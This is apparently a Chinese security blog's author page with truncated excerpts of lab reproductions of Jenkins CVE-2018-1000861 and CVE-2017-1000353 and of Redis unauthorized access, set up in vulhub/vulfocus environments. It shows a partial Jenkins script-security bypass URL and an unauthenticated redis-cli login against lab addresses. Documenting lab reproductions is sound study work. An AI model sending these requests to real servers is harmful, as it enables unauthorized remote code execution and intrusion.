Xor0ne

1、漏洞环境环境名称: jenkins-cve_2018_1000861攻击机：kali2、漏洞复现2.1、方法一我们直接在浏然器中输入：http://192.168.20.128:8080/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=publi

Jenkins是一个开源软件项目，是基于Java开发的一种持续集成工具，用于监控持续重复的工作，旨在提供一个开放易用的软件平台，使软件的持续集成变成可能。Jenkins功能包括：1、持续的软件版本发布/测试项目。2、监控外部调用执行的工作。文章目录1、漏洞描述及环境2、漏洞复现2.1、工具下载2.2、工具利用2.3、检验参考链接：1、漏洞描述及环境环境名称: vulfocus/jenkins-cve_2017_1000353官方复现教程：https://vulhub.org/#/env

文章目录1、漏洞描述及环境2、漏洞复现攻击利用_1攻击利用_23、redis的安装3、参考链接1、漏洞描述及环境环境：vulfocus2、漏洞复现如果安装了redis的话，我们可以直接用如下语句，进行登录。redis-cli -h 192.168.1.177 -p 53877 如下，可以发现不需要输入密码啥的我们就进去了，所以表明不需要授权我们就可以登录进去啦！！！那么接下来，我们来开始进行漏洞利用吧！攻击利用_1工具：https://github.com/n0b0dyCN/redi